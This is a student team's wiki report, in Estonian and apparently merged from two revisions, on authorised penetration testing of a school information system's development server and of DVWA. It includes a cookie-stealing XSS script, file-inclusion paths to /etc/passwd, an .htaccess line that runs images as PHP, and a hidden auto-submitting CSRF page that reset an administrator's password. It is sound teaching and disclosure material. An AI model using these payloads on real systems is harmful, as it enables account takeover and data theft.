Proxy -> options alt lülitada sisse proxy listner pordile 8080 .<br>
Ohvri valimine <br>
Valida intruder -> target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.<br>
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.<br>
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.<br>site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.<br>
Targer->scope -> exclude frome scope ja veenduda at välja on arvatud logout laused.<br>
Spideringi sisselülitamine <br>
Valida tab Spide ning sealt panna linnuke kasti spider running.<br>
Ning oledki valmis saama laheküljelt infot.<br>
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.<br>
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.

====Nessuse algkäivitamine====
Valida backtrackist vulnerability scannerite alt nessus ning edasi nessus register .<br> Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.<br> Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)<br>
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)<br>
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.<br>
Järgnevalt valida nessus start.<br>
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.<br>
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.

=== Matise tegevus ===

====Väike upload tegevus, mis võiks olla teisiti====
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.
Proovisime üles laadida:
<li>filmi
<li>exe
<li>jpm faile
<br>kõik läks läbi ja sai uploadida.
<br>Sellises kohas võiks olla süsteem tehtud <b>whitelisti</b> põhimõttel,
<br>et lubatud oleks ainult:
<li>.doc
<li>.docx
<li>.pdf

=== Sanderi tegevus ===
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]
Backtarcki keskkonnas sai testitud programmi w3af.

==== Backtrack: w3af ====
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]
Võimalik kätte saada SSL Certificate.
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:
https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?
username=<font color="red">KASUTAJANIMI</font>&continue=&Login=Logi sisse&pw=<font color="red">PAROOL</font>
Programmi sisestatud andmetega ka mitte:
Configuration -> HTTP Config -> Basic HTTP Authentication:
basicAuthUser: <font color="red">KASUTAJANIMI</font>
basicAuthPass: <font color="red">PAROOL</font>
basicAuthDomain: http://itcollege.dev.ois.ee
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:
Configuration -> HTTP Config -> Cookies
cookieJarFile: /root/Desktop/<font color="red">ois_cookie.txt</font>
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:
# Netscape HTTP Cookie File
.dev.ois.ee TRUE / FALSE 1731510001 itcollege_OIS_SESSION_ID <font color="red">870aqllryuw3cmf6cv8ellha03</font>
Esimene rida on nõutav! Teiste tähendused:
domain - The domain that created and that can read the variable.
flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.
This value is set automatically by the browser, depending on the value you set for domain.
path - The path within the domain that the variable is valid for.
secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.
expiration - The UNIX time that the variable will expire on.
name - The name of the variable.
value - The value of the variable.
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:
Edit -> Preferences -> Privacy -> History -> remove individual cookies
Search: itcollege.dev.ois.ee
Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID

Skänneerimine:
<ul>
<li>The page language is: en</li>
<li>The URL: "https://itcollege.dev.ois.ee/" has a "<form>" element with auto-complete enabled.</li>
<li>A comment with the string "<p>tunne end kui koolis</p>" was found in: "https://itcollege.dev.ois.ee/".</li>
<li>Found a form login. The action of the form is: "https://itcollege.dev.ois.ee/auth/login".</li>
The username field to be used is: "username".
The password field to be used is: "pw".
<li><font color="red">Found authentication credentials to: "https://itcollege.dev.ois.ee/auth/login". A correct user and password combination is: Administrador/6666666</font></li>
Antud kasutaja ja parooliga sisse ei saanud.
<li>The URL: "https://itcollege.dev.ois.ee/" returned a response that may contain a "SHA1" hash. The hash is: "c7b39896de5f296b5a44c2dfcd9f0600b2cf424d". This is uncommon and requires human verification.</li>
Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.
<li>The URL: "https://itcollege.dev.ois.ee/" sent these cookies:</li>
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/
<li>The SMTP settings in emailReport plugin seem to be incorrect. Original error: "[Errno 111] Connection refused".</li>
Kui tuleb see veateade, siis skänn katkeb.
<li><font color="red">The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):</font></li>
The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
<li><font color="red">SQL injection in a Unknown database was found at: "https://itcollege.dev.ois.ee/auth/login", using HTTP method POST.</font></li>
The sent post-data was: "username=John8212&security_key_sis_global=d'z"0&Login=Logi%20sisse&continue=56&pw=FrAmE30.".
The modified parameter was "security_key_sis_global". This vulnerability was found in the request with id 390.
<li>Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt</li>
User-agent: *
Disallow: /
Allow: /curriculum
Allow: /subject
Allow: /diploma
Allow: /schedule/ical
</ul>

== 4. päev - Presentatsiooni tegemine ja esitlemine ==

Koostasime presentatsiooni ja esitlemine.

[[Media:Security_team_presentation.ppt]]

== Arvamused intensiivõppe nädala kohta ==

Sander: Õppisime erinevaid testprogramme ja testkeskkondi kasutama, mida varem kunagi kasutanud polnud. Suutsime avastada nii mõnegi vea, mida varem avastatud ei olnud. Usun, et ÕIS on nüüd kasvõi veidigi turvalisem. Soovitan ka teistele tudengitele intensiivõppenädalal osalemist, kuna valides õige teema võib olla päris huvitav tegeleda millegagi, mida varem teinud pole või mida tegelikult lihtsalt ei ole lubatud teha.

Urmo: Intensiivõppe nädalaga sai õpitud nii mõndagi huvitavat veebiturve ja selle testimise kohta. Kuna aega oli vähe, siis sai hulgaliselt kogemust ja oskust reaalselt planeerida mahukat tööd täiesti nullist kuni reaalse rakendatava tulemuseni ning pani proovile stressitaluvuse tõestamaks pinge all jätkusuutlikku töötamist. Intensiivõppe nädalal võiksid osaleda kõik, kellel väheke tahtmist midagi uurida ja korda saata ning saada reaalset töökogemust ennem töömaailma sukeldumist.

== Tegijad ==
Alo Konno A21

Urmo Lihten A21

Taavi Podžuks A22

Matis Alliksoo A22

Sander Saarm A22

== Juhendajad ==
Täname oma juhendajaid:
:Mart Mangus
:Margus Ernits
:Valter Kungla

Security team

2012-03-30T20:56:16Z

Ulihten: /* Alo tegevus */

== 1. päev - Materjalidega tutvumine ==

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

A1: Injection - Urmo
A2: Cross-Site Scripting (XSS) - Alo
A3: Broken Authentication and Session Management - Sander
A4: Insecure Direct Object References - Alo
A5: Cross-Site Request Forgery (CSRF) - Taavi
A6: Security Misconfiguration - Matis
A7: Insecure Cryptographic Storage - Matis
A8: Failure to Restrict URL Access - Urmo
A9: Insufficient Transport Layer Protection - Taavi
A10: Unvalidated Redirects and Forwards - Sander

Sanderi konspekt: [[Media:Ois_materjal.pdf]] <br>
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] <br>
Taavi esitlus [[Media:A9.pdf]] <br>
Taavi esitlus [[Media:A5.pdf]] <br>
Matise esitlus [[Media:Insecure Cryptographic Storage.pdf]] <br>
Matise esitlus [[Media:Security Misconfiguration.pdf]] <br>
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] <br>

== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==
===Security Team tegevusplaan===
1. Päev
1.1 Tutvuda OWASP’iga.
1.2 Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.
1.3 Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.
2. Päev
2.1 Esitada tiimi tegevusplaan.
2.2 Tutvuda turvariskidega natuke põhjalikumalt.
2.3 Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.
2.4 Täiendada esimese päeva ettekannet.
3. Päev
3.1 Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.
3.2 Saadud tulemuste dokumenteerimine.
4. Päev
4.1 Saadud tulemuste esitlemine ettekandega
5. Päev
5.1 Tulemuste parandamine wiki’s.

=== Alo tegevus ===
==== Acunetix Web Vulnerability Scanner v. 8 automaatskännimise tööriistaga tutvumine ====
http://www.acunetix.com/support/vulnerability-checks.htm
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting
http://www.youtube.com/watch?v=SG1cvGQ971g
http://www.isecom.org/research.html
http://evuln.com/tools/
http://sectools.org/tag/web-scanners/
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/
http://www.acunetix.com/vulnerability-scanner/getting-started.htm

Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:
Acunetix Web Vulnerability Scanner v. 8
http://www.acunetix.com/vulnerability-scanner/

Pärast programmi installimist tuli seadistada skännimine, valisime keskmise põhjalikkusega skänni.

Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.

Antud programm võimaldab skännida:
Cross-Site Scripting (XSS)
SQL Injection (blind test)
File inclusion
Code Execution
LDAP Injection
Cross Frame Scripting
SQL Injection (error msg. test)
CRLF Injection
Directory Travelsal
XPath Injection
URL Redirection
Application Error Message

Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.

=== Urmo tegevus ===

Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.

Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application'i.

==== Brute Force (DVWA) ====
Käsitsi välja uuritud login andmed:
kasutajanimi: admin
parool: password

===== Fireforce plugin Firefoxis =====
Tekitatud sai ka password list faili pass.txt.

Kasutusel oli Firefox brauser, kuhu installisime plugin'a Fireforce.
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .

Panime kasutajanimeks "admin" ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud.
Selleks sai sõna "incorrect".
Määrata ära tuli ka, et mitu päringut sekundis tehakse.
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada.
Päringute tegemise kiirus vähem kui 1 päring/sekundis.

Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.
Kasutasime ka videos näidatud "@ DICTIONARY" teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.

Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.

===== Burpsuite v1.4 =====
Burpsuite v1.4 on Samurai WTF'il olemas juba sees ja saab kohe käima panna.
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI'st]]

Programm on juba loomult keerulisem.
Burpsuite'iga tuleb panna käima proxy server localhost'is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine.
Läbi proxy serveri tuleb BurpSuite'ile kohale vastava veebilehe Header sisselogimise kohta.
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.
Payload'i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.
Ründe stiiliks määrata Pitchfork.
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -> Start Attack, mis siis alustas rünnet.
Kahjuks ka see rünne ei toiminud teadmata põhjusel.
Proovitud sai ka lühemate nimekirjadega ja edutult.

Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt.
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.

Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.

==== CSRF - Cross-site request forgery ====
Katsetamine toimub koos Taaviga.

Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.

Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.

Lõime uue faili - crosssite.txt

DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.
Võtsime lehe Source Code lahti
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.
Current Password lahtri jätsime samaks.
Ülejäänud kahe uue passwordi fieldi type'iks määrasime "Hidden" ja value'deks "admin".
Salvestasime faili ja käivitasime selle.
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna ".

Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.

=== Taavi tegevus ===

Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.

=== Matise tegevus ===
==== Reflected Cross Site Scripting (XSS) ====
<ul>
<li>Lehel on selline Form:</li>
[[Image:Xsstesting.jpg|Location="left"|Caption|]]
<br>Form väljastab : Hello „sisestatud nimi“
<li>Easy puhul:</li>
<li>Saab sisestada textboxi skripti:</li>
<script>
alert(document.cookie.match(/PHPSESSID=[^;\]+/));
</script>
<li>Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.</li>
<li>Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: </li>
<script>
this.document.location.href = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);
</script>
<li>Saab kohe enda veebiserveri logidest näha Session ID’d.
<br>Näide logist:</li>
/var/log/apache2/access.log
127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] "GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1" 404 404 "-" <br> "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11"
<li>Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.</li>
</ul>

=== Sanderi tegevus ===
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]

SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).
==== Faili üleslaadimine: madal tase ====
<ul>
<li><b>DVWA Security</b> määrata: Low -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess</li>
Üleslaetavasse *.php faili saab kirjutada php koodi:
<?php var_dump($_REQUEST, $_SERVER); ?>
<li>Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:</li>
esimeses massiivis "PHPSESSID" ("2b1ae19446cfde009664f18df51b6ec1") ja turvatase "security" ("low");
teises "HTTP_COOKIE", milles on eelnevadki andmed; asukoht "PATH", "SERVER_SOFTWARE", "SERVER_NAME",
"SERVER_ADDR" ("127.42.84.1"), "SERVER_PORT" ("80"), "REMOTE_ADDR" ("127.42.84.1"), "REMOTE_PORT" ("53425") jpm.
</ul>

==== Faili üleslaadimine: keskmine tase ====
<ul>
<li><b>DVWA Security</b> määrata: Medium -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida ei saa näiteks järgnevates formaatides faile:</li>
.htaccess
.php .html .pdf
.gif .png .bmp
.svg .swf
.tif .tiff .exif
.raw .cgm
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
<li>Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:</li>
http://dvwa/hackable/uploads/*.jpg
<li>Skripti käivitamiseks tuleb kasutada "?page=" ja faili asukoht:</li>
http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg
Kuvatakse php skripti tulemus.
Kommentaar: "?page=" kasutamine võetud menüüvalikust: <b>File Inclusion</b>
<li>"?page=" abil saab vaadata kasutajate nimesid:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd
<li>Paroole vaadata ei saa, selleks õigused puuduvad:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow
</ul>

==== Faili üleslaadimine: kõrge tase ====
<ul>
<li><b>DVWA Security</b> määrata: High -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.</li>
<li>Skripti käivitamiseks ei piisa ka "?page=" kasutamisest. Igal juhul on vastus selline:</li>
ERROR: File not found!
<li>Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:</li>
http://www.motobit.com/util/base64-decoder-encoder.asp
<li>Moodustades loodud faili asukohast kood ja kasutades</li>
data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:
http://dvwa/hackable/uploads/*.jpg
</ul>

== 3. päev - Dev-ÕIS'i turvatestimine==

=== Alo tegevus ===
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.<br>
Faile saab alla laadida enda profiili all õppesooritustes.<br>
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.<br>
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.<br>
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.<br>
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.<br>
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.<br>

=== Urmo tegevus ===
====Subgraph Vega ====
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.
Programm on Java põhine graafilise liidesega ja töötab Linux'i, OS X ja Windowsi peal.

[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.

Alustasime uut skänni (Start New Scan).
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.

Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised.

Me lisasime ainult küpsise (cookie) sisu:
<pre>
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221
</pre>
ning Finish.

[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).

Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000.

Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script'ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body nõrkust.

Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID'sid ja parameetreid ära oma pealkirjades.
Õnneks parameetritega väljad olid veebilehel korralikult ära escape'itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.

ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.

==== Wapiti ====
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti.
(Koduleht: http://wapiti.sourceforge.net/)

Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS'iga midagi teha.

==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====
=====1. katse - ÕISi keskkkonna keelevahetus =====
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]

Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.

Võtsime dev-ÕIS'i Source Code'ist välja vastava formi osa ja panime eraldi html faili.
Koristasime mittevajaliku disaini koodi juurest ära.
Muutsime form'i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks "en" ehk inglise keelne keskkond tekiks.
Panime koodi enose veebiserverisse üles nimega ois.html.

Faili sisu:
<source lang="html4strict">
<form id="settingsForm" method="post" action="https://itcollege.dev.ois.ee/setting/edit?user_id=2198"
enctype="application/x-www-form-urlencoded">
<input type="hidden" AUTOCOMPLETE="off" name="default_language"value="en">
<br>
<input type="submit" value="Salvesta seaded" name="Savesettings">
</form>
</source>
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.

Katsetas koodi enda konto peal Taavi.

=====2. katse - ÕIS'i kasutaja parooli muutmine =====

[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.

Selle jaoks uurisime välja, kus asub dev-ÕIS'i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.

Muutsime password ja password_check lahtrite väärtused järgnevaks: "test123" ehk kasutaja uus parool peale rünnakut.

Lahtrites muutsime user_id'd sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.

Kõik vormi lahtrite tüübid määrasime peidetud ehk "hidden", et poleks midagi näidata.

Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist.
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.

Lisasime CSS koodi Submit nupu ära peitmiseks.
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.

Salvestasime faili ära kui "screen1.jpg" fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.

Faili sisu:
<source lang="html4strict">
<html>
<head>
<style type="text/css">
#Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }
</style>
</head>
<body>
<body onload="document.forms.setPasswordForm.submit();">
<form name="setPasswordForm" id="setPasswordForm"
action="https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&continue=/auth/logout"
method="post">
<input type="hidden" name="user_id" value="2227" id="user_id" />
<input type="hidden" name="continue" value="%2Fet%2Fsetting%3Fuser_id%3D2227" id="continue" />
<input type="hidden" name="password" id="password" value="test123" />
<input type="hidden" name="password_check" id="password_check" value="test123" />
<input type="submit" name="Setpassword" id="Setpassword" value="Muuda salasõna" />
</form>
</body>
</html>
</source>

[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]

Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.
<pre>
AddType application/x-httpd-php .php .jpg
</pre>

Laadisime mõlemad failid Enose veebiserverisse avalikult.

Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki.
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle.
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail.
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja.
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud "test123"-ks ja me saime ligipääsu administraatori õigustes kontole.
Rünnak oli edukas.
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]

Andsime teada Valterile teada, et tegelikult tegime salajase ründe.
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha.
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug'iga.

Kuna tegu oli ÕIS'i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.

=== Taavi tegevus ===
====Burp suite====

Esimese asjane peale Burp suite käivitamist. Tabilt proxy ->intercept ->intercept off<br>
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)<br>
Proxy -> options alt lülitada sisse proxy listner pordile 8080 .<br>
Ohvri valimine <br>
Valida intruder -> target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.<br>
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.<br>
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.<br>site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.<br>
Targer->scope -> exclude frome scope ja veenduda at välja on arvatud logout laused.<br>
Spideringi sisselülitamine <br>
